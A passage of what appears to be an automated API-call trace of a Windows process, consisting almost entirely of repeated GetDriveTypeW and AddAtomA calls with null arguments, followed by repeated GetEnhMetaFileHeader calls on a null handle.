(lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.805] AddAtomA (lpString=0x0) returned 0x0 [0107.805] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.805] AddAtomA (lpString=0x0) returned 0x0 [0107.805] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.805] AddAtomA (lpString=0x0) returned 0x0 [0107.805] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.805] AddAtomA (lpString=0x0) returned 0x0 [0107.805] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.805] AddAtomA (lpString=0x0) returned 0x0 [0107.805] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.805] AddAtomA (lpString=0x0) returned 0x0 [0107.805] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.854] AddAtomA (lpString=0x0) returned 0x0 [0107.854] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.854] AddAtomA (lpString=0x0) returned 0x0 [0107.854] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.854] AddAtomA (lpString=0x0) returned 0x0 [0107.854] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.855] AddAtomA (lpString=0x0) returned 0x0 [0107.855] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.855] AddAtomA (lpString=0x0) returned 0x0 [0107.855] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.855] AddAtomA (lpString=0x0) returned 0x0 [0107.855] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.855] AddAtomA (lpString=0x0) returned 0x0 [0107.855] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.855] AddAtomA (lpString=0x0) returned 0x0 [0107.855] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.855] AddAtomA (lpString=0x0) returned 0x0 [0107.855] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.855] AddAtomA (lpString=0x0) returned 0x0 [0107.855] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.855] AddAtomA (lpString=0x0) returned 0x0 [0107.855] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.855] AddAtomA (lpString=0x0) returned 0x0 [0107.855] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.855] AddAtomA (lpString=0x0) returned 0x0 [0107.855] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 